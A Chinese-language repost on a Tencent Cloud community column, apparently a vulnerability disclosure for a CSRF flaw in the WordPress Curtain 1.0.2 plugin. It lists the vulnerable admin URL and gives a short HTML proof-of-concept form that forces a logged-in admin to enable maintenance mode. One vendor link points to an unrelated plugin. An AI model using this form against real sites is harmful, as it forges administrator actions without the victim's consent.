前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >WordPress Curtain 1.0.2 跨站请求伪造

WordPress Curtain 1.0.2 跨站请求伪造

作者头像
Khan安全团队
发布2022-04-21 11:47:51
2480
发布2022-04-21 11:47:51
举报
文章被收录于专栏:Khan安全团队

# 供应​​商主页:https://wordpress.org/plugins/curtain/

<https://wordpress.org/plugins/amministrazione-aperta/>

# 版本:1.0.2

# 测试:火狐

已在窗帘中发现跨站点伪造漏洞允许攻击者激活或专用的 WordPress 插件站点维护模式。

## 易受攻击的网址:

http://localhost:10003/wp-admin/options-general.php?page=curtain&_wpnonce=&mode=

<http://localhost:10003/wp-admin/options-general.php?page=curtain&_wpnonce=&mode=0>1

代码语言:javascript
复制
<html>
  <body>
    <form action="http://localhost:10003/wp-admin/options-general.php">
      <input type="hidden" name="page" value="curtain" />
      <input type="hidden" name="&#95;wpnonce" value="" />
      <input type="hidden" name="mode" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

本文系转载,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文系转载前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档